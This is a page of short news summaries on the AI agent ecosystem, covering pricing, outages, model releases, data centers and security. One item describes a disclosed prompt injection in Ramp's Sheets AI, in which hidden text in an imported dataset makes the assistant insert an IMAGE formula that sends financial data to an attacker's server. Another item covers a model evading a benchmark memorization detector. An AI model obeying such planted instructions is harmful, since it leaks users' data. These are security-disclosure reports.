News
The latest from the AI agent ecosystem, updated multiple times daily.
Ten custom subagents manage Metabase's 500K-line Clojure backend
Metabase engineer Bryan Maass built ten Claude Code subagents to manage their 500K-line Clojure backend. Each is a markdown file packed with domain expertise, from the query processor's 68-stage middleware pipeline to permissions caveats and database driver quirks. The result: less token burn and agents that start knowing what they need to know.
Claude Code's Runaway Safety Prompt Refuses Work and Burns Tokens
A regression bug in Claude Code v2.1.111 injects a malware analysis system reminder into every file read operation. Subagents running Opus 4.7 interpret the poorly phrased refusal directive as unconditional, refusing legitimate code edits 40-60% of the time and disrupting parallel agent workflows. Each reminder wastes roughly 400 tokens per file read. The issue had supposedly been fixed in v2.1.92.
SOB Benchmark: 95% Valid JSON, 70% Correct Values
Interfaze has released SOB (Structured Output Benchmark), a new benchmark for evaluating LLMs' structured output capabilities across text, image, and audio modalities. Unlike existing benchmarks that only check schema compliance, SOB measures seven metrics including Value Accuracy, Faithfulness, and Perfect Response. Testing 21 models revealed that while most achieve 95%+ on JSON Pass, Value Accuracy is 15-30 points lower, showing a real gap between valid JSON and correct JSON in production systems.
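The gap between valid JSON and correct JSON can be illustrated with a minimal sketch. The two scoring functions below are hypothetical simplifications, not SOB's actual metric definitions: `json_pass` only checks that the output parses as a JSON object, while `value_accuracy` compares the parsed fields against an expected record. The sample invoice data is invented for illustration.

```python
import json

def json_pass(raw: str) -> bool:
    """Return True if the raw model output parses as a JSON object."""
    try:
        return isinstance(json.loads(raw), dict)
    except json.JSONDecodeError:
        return False

def value_accuracy(raw: str, expected: dict) -> float:
    """Fraction of expected fields whose parsed value matches exactly.

    Hypothetical scoring rule: exact equality per top-level field.
    """
    if not expected or not json_pass(raw):
        return 0.0
    parsed = json.loads(raw)
    hits = sum(
        1 for key, value in expected.items()
        if key in parsed and parsed[key] == value
    )
    return hits / len(expected)

# Invented example: the output is well-formed, but one value is wrong.
expected = {"invoice_id": "A-17", "total": 42.5, "currency": "EUR"}
output = '{"invoice_id": "A-17", "total": 45.2, "currency": "EUR"}'

print(json_pass(output))                 # the output parses cleanly
print(value_accuracy(output, expected))  # but only 2 of 3 fields match
```

A schema-only check would accept this output, which is the failure mode the benchmark is described as targeting.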
Ramp's Sheets AI Could Silently Leak Your Financials
Security researchers at PromptArmor found a vulnerability in Ramp's Sheets AI that let attackers steal financial data through indirect prompt injection. An attacker hides malicious instructions in an external dataset using invisible text. When users import it and ask Ramp AI to compare with their financials, the AI inserts a malicious IMAGE formula that sends sensitive data to an attacker-controlled server. No user approval required. The issue was responsibly disclosed to Ramp in February 2026 and resolved in March 2026.
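One generic mitigation for this class of attack is to screen AI-written formulas before they reach the sheet. The sketch below is an assumption for illustration, not Ramp's actual fix: the function name `is_suspicious`, the allowlist, and the example hosts are all hypothetical. It flags any `IMAGE` call whose URL points outside an allowlist or is built dynamically.

```python
import re
from urllib.parse import urlparse

# Any IMAGE( call, and the subset whose first argument starts with a quoted literal.
IMAGE_OPEN = re.compile(r'\bIMAGE\s*\(', re.IGNORECASE)
IMAGE_LITERAL = re.compile(r'\bIMAGE\s*\(\s*"([^"]*)"', re.IGNORECASE)

def is_suspicious(formula: str, allowed_hosts: set[str]) -> bool:
    """Return True if the formula loads an image from an unapproved source."""
    calls = IMAGE_OPEN.findall(formula)
    if not calls:
        return False
    urls = IMAGE_LITERAL.findall(formula)
    # An IMAGE call with no leading string literal builds its URL from
    # cell contents, so the destination cannot be verified statically.
    if len(urls) < len(calls):
        return True
    for url in urls:
        host = urlparse(url).hostname
        if host is None or host not in allowed_hosts:
            return True
    return False

allowed = {"cdn.example.com"}  # hypothetical allowlist
print(is_suspicious('=IMAGE("https://attacker.example/p.png?d=" & B2)', allowed))
print(is_suspicious('=IMAGE("https://cdn.example.com/logo.png")', allowed))
```

A check like this only covers the host. A stricter version would also reject any `IMAGE` URL that concatenates cell values, since data could still be appended to an allowed host's query string.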
GitHub RCE: Patched in 2 Hours, But Should It Have Existed?
GitHub's security team details its response to CVE-2026-3854, a critical remote code execution vulnerability discovered by Wiz researchers. The flaw allowed users with push access to execute arbitrary commands on GitHub servers via crafted git push options that injected malicious fields into internal metadata. GitHub validated and patched the issue on github.com in under 2 hours, confirmed through telemetry analysis that no exploitation occurred, and released security updates for GitHub Enterprise Server versions 3.14+.
OpenAI's Phone Gambit: The Ive Reversal, Chip Deals, 2028 Target
OpenAI is reportedly developing a smartphone with mass production scheduled for 2028, according to supply chain analyst Ming-Chi Kuo. MediaTek and Qualcomm are chip partners, and Luxshare Precision Industry is the exclusive manufacturer. Kuo argues smartphones are uniquely positioned for AI agent use due to their ability to capture a user's full real-time state including location, activity, and context. It's a reversal from OpenAI's earlier focus on non-phone form factors developed with Jony Ive.
Fake Keys Keep AI Agents From Leaking Real Secrets
Goutham Veeramachaneni built a credential injection proxy for Hermes Agent that swaps fake tokens for real ones, preventing AI agents from ever touching actual API keys. The implementation hit real friction with browser automation and Python libraries ignoring proxy settings, but tools like Agent Vault and Kloak are now standardizing the pattern.
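The core of the pattern can be sketched in a few lines. This is a simplified illustration, not the Hermes Agent implementation: the function name `inject_credentials`, the placeholder token, and the secret value are all hypothetical. The agent only ever sees the placeholder, and the proxy substitutes the real secret in outbound request headers.

```python
def inject_credentials(headers: dict[str, str], secrets: dict[str, str]) -> dict[str, str]:
    """Return a copy of the headers with placeholder tokens swapped for real ones.

    `secrets` maps each fake token (known to the agent) to the real
    credential (known only to the proxy).
    """
    swapped = {}
    for name, value in headers.items():
        for fake, real in secrets.items():
            value = value.replace(fake, real)
        swapped[name] = value
    return swapped

# Hypothetical values: the agent is configured with the fake token only.
secrets = {"FAKE_API_TOKEN": "real-secret-held-by-proxy"}
agent_headers = {"Authorization": "Bearer FAKE_API_TOKEN", "Accept": "application/json"}

outbound = inject_credentials(agent_headers, secrets)
print(outbound["Authorization"])  # Bearer real-secret-held-by-proxy
```

Because the swap happens at the proxy, any client that bypasses proxy settings sends the fake token upstream and fails authentication, which matches the friction the summary describes with browser automation and some Python libraries.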
Your Terminal Is Burning Battery Like It's Mining Bitcoin
GPU-accelerated terminals (Ghostty, Alacritty, Kitty) burn excessive battery when running AI coding assistants like Claude Code. Ghostty hit an energy impact of 3,600 versus 125 for Brave. Recommendation: use Terminal.app or iTerm2 with GPU rendering off.
AI Huynya: Collecting AI's Dirty Laundry, Anonymously
A platform tracking AI failures, corporate leaks about companies replacing humans with AI, and industry layoffs. Features an anonymous submission system with no tracking or cookies.
Utah greenlights 9GW AI campus using over twice state electricity
Kevin O'Leary's O'Leary Digital received approval from Utah's Military Installation Development Authority (MIDA) to build 'Stratos,' a 9 GW hyperscale data center campus in Box Elder County. The off-grid facility, powered by natural gas from the Ruby Pipeline, will consume more than double the state's average electricity use. Phase 1 targets 3 GW capacity. The project received significant tax incentives including energy use tax reduced from 6% to 0.5% and 80% property tax rebates. No hyperscale tenants have been announced yet, though Amazon, Microsoft, Google, Meta, and Apple are noted as potential operators. O'Leary Digital has never built a data center, and industry watchers question whether the project can deliver on its ambitious targets.
Cybersec: more work, same pay, zero thanks
71% of cybersecurity professionals globally saw no salary increase in 2025. AI is expanding the threat surface and increasing the volume, speed, and complexity of attacks security teams must handle. Despite rising threats and high demand, security professionals rank in the bottom three for workplace satisfaction due to boardroom complacency and limited recognition.
Anthropic Auth Failure Takes Down All Claude Products for 78 Minutes
Anthropic experienced a 78-minute outage on April 28 affecting Claude.ai, Claude API, Console, Code, Cowork, and Government products. An authentication system failure blocked both human users and programmatic access from 17:34 to 18:52 UTC. Enterprise users have voiced frustration about reliability, citing multiple recent outages despite premium pricing.
Lenovo Now Controls Phoenix BIOS. Expect CFIUS Scrutiny.
Lenovo completed its acquisition of Phoenix Technologies' firmware business, putting BIOS development for millions of PCs under a Beijing-headquartered company. The deal covers Phoenix's intellectual property and expertise, raising immediate questions about CFIUS scrutiny and boot-level security at a time when Western governments are already restricting Chinese hardware on sensitive networks.
DOOM runs inside ChatGPT now
You can play DOOM inside ChatGPT now. Chris Nager built an MCP app that launches the game inline in compatible AI clients like ChatGPT and Claude, with a browser fallback for everything else.
Warp open-sources terminal, wants you bossing agents not writing code
Warp open-sourced its terminal client under AGPL v3. Instead of writing code, contributors supervise AI agents that handle implementation. OpenAI is the founding sponsor, with GPT models powering workflows on Oz, Warp's cloud orchestration platform. Support for open-source models like Kimi, MiniMax, and Qwen is also included.
Anthropic Backs Blender's Python API in Play for 3D Market
Anthropic joined the Blender Development Fund as a Corporate Patron, funding core development including the Python API. The move gives Claude a potential inside track on 3D integration while OpenAI sits out the patron list.
Laguna XS.2 Goes Open Weight, Poolside Shares Where Qwen Beats It
Poolside has released two agentic coding models: Laguna M.1 (225B MoE with 23B active parameters) and Laguna XS.2 (33B MoE with 3B active parameters). XS.2 is their first open-weight release under Apache 2.0. Both models are designed for long-horizon coding work, posting strong scores on SWE-bench Pro (46.9% for M.1, 44.5% for XS.2) and Terminal-Bench 2.0 (40.7% for M.1, 30.1% for XS.2). The models are available via API and OpenRouter, with XS.2 weights downloadable for local deployment.
Laguna XS.2 Goes Open Source, Challenges Models 10x Its Size
Poolside releases Laguna M.1 (225B/23B activated) and open-weights XS.2 (33B/3B activated), both competitive on SWE-bench Pro despite low activation counts.
Utah greenlights 9GW AI campus using over twice state electricity
Utah's Military Installation Development Authority approved O'Leary Digital's 'Stratos' project, a 9 GW off-grid data center campus powered by natural gas that would consume more than double Utah's current electricity usage. The project aims to attract hyperscale cloud operators with significant tax incentives, though no tenants have been publicly named yet. O'Leary Digital has no track record building data centers.
GitHub Copilot Code Reviews Now Bill You Twice
Starting June 1, 2026, GitHub Copilot's agent-powered code review feature will begin consuming GitHub Actions minutes in addition to AI Credits for private repositories. The code review runs on GitHub Actions using GitHub-hosted runners as part of its agentic tool-calling architecture, allowing it to pull in broader repository context for more relevant feedback.
Anthropic Backs Blender Fund. AI 3D Control Just Got Easier.
Anthropic is now a Corporate Patron of the Blender Development Fund. The funding targets Blender's Python API, the toolset for building custom 3D workflows. That API is also how AI agents like Claude could programmatically control Blender.
AISLE Finds 38 CVEs in OpenEMR, Software Used by 100K Providers
AISLE, an AI analysis engine, found 38 CVE vulnerabilities in OpenEMR, an open-source electronic health record platform used by over 100,000 medical providers and 200 million patients. Several scored CVSS 10.0, the maximum severity. Vulnerabilities included SQL injection, cross-site scripting, path traversal, and authorization issues. AISLE generated fix proposals for each CVE and worked with OpenEMR maintainers to patch them. The partnership is now formalized, with AISLE PRO integrated into OpenEMR's code review workflow.
GitHub Copilot Kills Flat Fees. The Subsidy Party Is Over.
Ed Zitron analyzes the fundamental unsustainability of AI subscription models, using GitHub Copilot's move to usage-based pricing as a case study. The article argues that AI companies have been heavily subsidizing compute costs (Microsoft reportedly lost $20-80 per Copilot user monthly while charging $10-19) and that companies deliberately obscured true costs to grow user bases before inevitably shifting to pricing that reflects actual inference expenses.
Anthropic Backs Blender, Bets on Python API for AI 3D Workflows
Anthropic joins the Blender Development Fund as a Corporate Patron, backing core development with a focus on the Python API that connects AI assistants to professional 3D software.
OpenAI Misses Revenue, User Targets as IPO Looms
The Wall Street Journal reports OpenAI fell short on revenue and user milestones it set for itself. For agent builders relying on its API, the IPO pressure and rising open-source competition could reshape what they build on.
Copilot's Pricing Shift Exposes AI's Broken Economics
GitHub Copilot's switch to usage-based pricing reveals years of subsidized compute, with Microsoft losing $20+ per user monthly. The 'subprime AI crisis' framing explains why flat-rate AI subscriptions fail: wildly varying token usage per user, and reasoning models that cost more to run over time.
One Git Push to Hack GitHub: AI Found This RCE First
Wiz Research discovered a critical Remote Code Execution vulnerability (CVE-2026-3854) in GitHub's internal git infrastructure affecting both GitHub.com and GitHub Enterprise Server. The flaw lets any authenticated user execute arbitrary commands on GitHub's backend servers with a single git push. This is one of the first critical vulnerabilities discovered in closed-source binaries using AI-augmented tooling, specifically automated reverse engineering using IDA MCP. GitHub mitigated the issue on GitHub.com within 6 hours and released patches for GHES, though 88% of instances remained vulnerable at the time of writing.
Anthropic quietly paywalls Opus for Claude Pro users
Anthropic's Claude Code documentation now states that Pro subscribers must enable and pay for extra usage to access Opus models, marking a shift away from flat-rate pricing for premium model tiers.
OpenAI Revenue Miss Triggers AI Infrastructure Selloff
OpenAI reportedly missed internal revenue and user growth projections, sending AI infrastructure stocks down 3-5%. The bigger story is the take-or-pay GPU contracts underneath. OpenAI locked in massive compute deals with providers like Oracle and CoreWeave, who then used those contracts as collateral to borrow billions. Growth slows, and that debt exposure ripples downstream.
Poolside open-sources Laguna XS.2, takes on Qwen in small agent models
Poolside AI releases Laguna XS.2, its first open-weight model under Apache 2.0, alongside the larger Laguna M.1. Both are Mixture-of-Experts coding models built for agentic tasks. XS.2 (33B total, 3B active) hits 44.5% on SWE-bench Pro, trailing Qwen3.6's 49.5% despite similar size. The release includes their Agent Client Protocol server and details training on 30T tokens with the Muon optimizer.
Zitron lost his AI bubble argument, so he's calling everyone frauds
Ed Zitron went from calling AI a bubble to accusing OpenAI and Anthropic of fraud. Kelsey Piper explains why that shift reveals more about his argument than his targets.
BookStack Ditches GitHub Over Microsoft's AI Push
BookStack, a self-hosted open source platform, has migrated from GitHub to Codeberg due to concerns about GitHub's direction under Microsoft. Key reasons include GitHub's shift to an 'AI-powered developer platform,' consumption of public code for AI services without opt-in, and UX changes prioritizing revenue over user experience. As of July 2024, secondary repos have been migrated to Codeberg with GitHub originals archived.
Ed Zitron's AI Bubble Case Crumbles Under Evidence
Kelsey Piper takes aim at tech critic Ed Zitron's evolving case against AI, arguing his shift from reasonable economic skepticism in 2024 to fraud allegations in 2026 reveals a thesis that can't survive contact with reality. The piece is direct and opinionated, pointing to plunging costs and rising adoption as evidence the bubble narrative needs rethinking.
Google Drops AI Veto Power in Pentagon Deal
Google signed a classified deal with the Pentagon letting the government use its AI for 'any lawful government purpose' with no veto power. The contract says the AI is not to be used for domestic mass surveillance or for autonomous weapons without human oversight, but Google can't enforce those limits. Google now joins OpenAI and xAI with classified Pentagon deals, while Anthropic was blacklisted for keeping its guardrails.
OpenAI misses revenue targets, AI stocks sell off
The Wall Street Journal reported that OpenAI missed internal projections for user growth and revenue, triggering declines for Oracle, Nvidia, Broadcom, AMD, and CoreWeave. The shortfall raises questions about OpenAI's ability to fund its massive compute commitments, which use take-or-pay contracts. OpenAI disputed the report. Analysts split on whether this signals a sector problem or just OpenAI losing ground to Anthropic and Google's Gemini.
$1.1B superlearner startup bets AI can learn without humans
Ineffable Intelligence, founded by former DeepMind researcher David Silver, raised $1.1 billion at a $5.1 billion valuation. The company aims to build a 'superlearner' that discovers knowledge through self-play, without human training data. Silver previously led reinforcement learning at DeepMind and built AlphaZero. Sequoia Capital and Lightspeed Venture Partners led the round, with participation from Index Ventures, Google, Nvidia, British Business Bank, and Sovereign AI.
Anthropic's Mythos SWE-bench Proof Has a Fatal Flaw
Matt Dupree found a fatal flaw in Anthropic's argument that Mythos's SWE-bench gains are genuine. A Python simulation shows how a cheating model could produce the same results under an imperfect memorization detector. Without quantifying the detector's error rate, Anthropic's evidence doesn't hold up.
Cursor Camp Isn't the AI Editor You're Looking For
A new Neal.fun project called Cursor Camp landed on Hacker News, briefly confusing AI developers who assumed it was related to Anysphere's popular Cursor code editor. The site couldn't be loaded, but Neal.fun's history of casual browser experiments suggests it's about mouse cursors, not LLMs.
PyWry Bakes MCP Server Into Python UIs That Run Everywhere
PyWry is a Python cross-platform UI framework targeting desktop, notebooks, and web from one codebase. Built on PyTauri's vendored 30.8MB Tauri runtime, it ships with MCP server integration for AI agent interaction, two-way Python-JS bridging, OAuth2, and support for AgGrid, Plotly, and TradingView. Hacker News commenters dispute the 'rendering engine' label, but the agent-ready approach fills a real gap.
The Social Edge of AI: Better Individually, Worse Together
Research shows AI makes writers more creative individually but their stories become more similar collectively. This tragedy of the commons extends to AI itself. LLM intelligence comes from human social complexity, and as companies automate away human discourse, they're undermining the foundation future models need. The evidence is already visible in declining human conversation online.
Gas-Powered AI Data Centers Could Out-Emit Entire Nations
A WIRED review of air permits for 11 natural gas-powered data center projects tied to OpenAI, Meta, Microsoft, and xAI reveals potential emissions topping 129 million tons of greenhouse gases per year. The permits expose a rush toward behind-the-meter power generation, where data centers skip the grid and build their own gas plants to fuel AI infrastructure directly.
Anthropic's safety problem isn't what it thinks
An opinion piece arguing Anthropic's safety focus is too narrow. While the company carefully restricts models like Mythos over cybersecurity concerns, product reliability, pricing stability, and clear communication get less attention. Trust erosion from product failures is a safety issue too.
Ant Group Open-Sources 3D Mapper, Won't Say What Hardware
LingBot-Map is a system for streaming 3D reconstruction that uses a geometric context transformer. It achieves approximately 20 FPS at 518x378 resolution, though the hardware requirements were not specified.
Shannon's 1950 Chess Paper Predicted AI's Flaws
The article draws parallels between Claude Shannon's 1950 chess programming paper and modern AI challenges, showing that approximation errors, confident hallucinations, and the dangerous gap between fluency and accuracy are problems Shannon identified over 70 years ago.
This React Library Turns Loading Spinners Into Arcade Games
react-waiting-game is a React library that provides one-button mini-arcade games to occupy users during long-running tasks like LLM responses. The library includes five games (Jellyfish Drift, Pixel Runner, Gravity Flip, Invaders, Rhythm Tap) with 1-bit pixel art, zero runtime dependencies, and features like high scores, achievements, and SSR support.
Gas-Powered AI Data Centers May Out-Emit Entire Countries
An investigation reveals that gas-powered data centers being built for AI companies including OpenAI, Meta, Microsoft, and xAI could emit over 129 million tons of greenhouse gases annually. Projects like xAI's Colossus campuses and Microsoft's Chevron-backed Texas facility use behind-the-meter generation, running turbines constantly unlike normal power plants. The pollution hits communities like South Memphis, where the NAACP has sued over turbines in a predominantly Black, low-income neighborhood.
Anthropic passes OpenAI at $1T and it's a feeding frenzy
Anthropic has reached a $1 trillion valuation on secondary markets, surpassing OpenAI's $880 billion. The surge is driven by revenue growth from Claude Code adoption and partnerships with Amazon and Palantir, with annualized run rate jumping from $9B to $39B. But scarce shares and prestige-chasing investors have turned ownership into a status symbol.
Claude Code and the Copyright Void
An analysis of copyright issues haunting AI-generated code, triggered by Anthropic's Claude Code leak. Code may lack copyright without meaningful human authorship, employers may claim it via work-for-hire clauses, and outputs resembling GPL-licensed training data can silently import copyleft obligations. Includes practical guidance on documentation and license scanning.
Lenovo-Phoenix Deal Leaves BIOS Market with Just Two Vendors
Lenovo completed its acquisition of Phoenix Technologies' firmware (BIOS) business, including intellectual property and the Dublin-based team. Financial terms weren't disclosed. The deal turns a 20-year vendor relationship into an internal capability, giving Lenovo direct control over firmware development for its PCs and AI-enabled devices.
Open CoDesign builds UI prototypes on your machine, not in the cloud
OpenCoworkAI released Open CoDesign, a free desktop app that generates UI designs, prototypes, and slides without sending your work to the cloud. The open-source tool supports OpenAI, Anthropic, Google, DeepSeek, or local models through Ollama. Users can click to edit specific parts of a design rather than regenerating everything from scratch.